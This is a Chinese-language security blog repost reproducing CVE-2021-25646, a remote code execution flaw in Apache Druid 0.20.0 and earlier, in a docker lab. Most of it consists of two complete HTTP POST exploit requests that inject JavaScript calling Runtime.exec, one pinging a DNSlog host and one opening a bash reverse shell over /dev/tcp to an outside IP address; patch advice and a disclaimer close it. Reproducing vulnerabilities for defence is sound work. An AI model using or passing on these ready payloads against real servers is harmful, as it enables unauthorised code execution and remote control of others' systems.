【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

admin
admin
admin
138876
文章
114
评论
2021年2月5日10:24:15评论154 views字数 2736阅读9分7秒阅读模式

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞


0x01 简介

        Apache Druid是美国阿帕奇软件(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库。
        Apache Druid 0.20.0和更早的版本存在访问控制错误漏洞,该漏洞允许经过身份验证的用户强制Druid运行用户提供的JavaScript代码,并执行服务器进程特权的代码。


0x02 环境搭建

直接docker拉取环境

docker pull fokkodriesprong/docker-druid #拉取镜像docker run --rm -i -p 8888:8888  fokkodriesprong/docker-druid #启动镜像

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

环境搭建成功访问是这个酱紫

http://192.168.46.131:8888

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

脚本检测(萌新写的太烂就不放出来了【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

0x03 漏洞复现


这里利用DNSlog检测是否可以执行命令,附上PoC:

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1Host: 192.168.46.131:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 556Origin: http://192.168.46.131:8888Connection: closeReferer: http://192.168.46.131:8888/unified-console.html
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('ping ylqm00.dnslog.cn')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

反弹shell(直接将ping命令换成反弹shell的命令就可以)

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1Host: 192.168.46.131:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 606Origin: http://192.168.46.131:8888Connection: closeReferer: http://192.168.46.131:8888/unified-console.html
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/138.128.214.57/6666 0>&1')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

直接上图

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

填写目录

quickstart/tutorial/wikiticker-2015-09-12-sampled.json.gz

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

开启代理抓包修改数据

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

反弹shell成功【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

0x04 安全建议

建议广大用户及时更新Apache Druid,下载链接为:

https://druid.apache.org/downloads.htmlhttps://github.com/apache/druid/releases/tag/druid-0.20.1


本文始发于微信公众号(Khan安全团队):【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年2月5日10:24:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞https://cn-sec.com/archives/262587.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息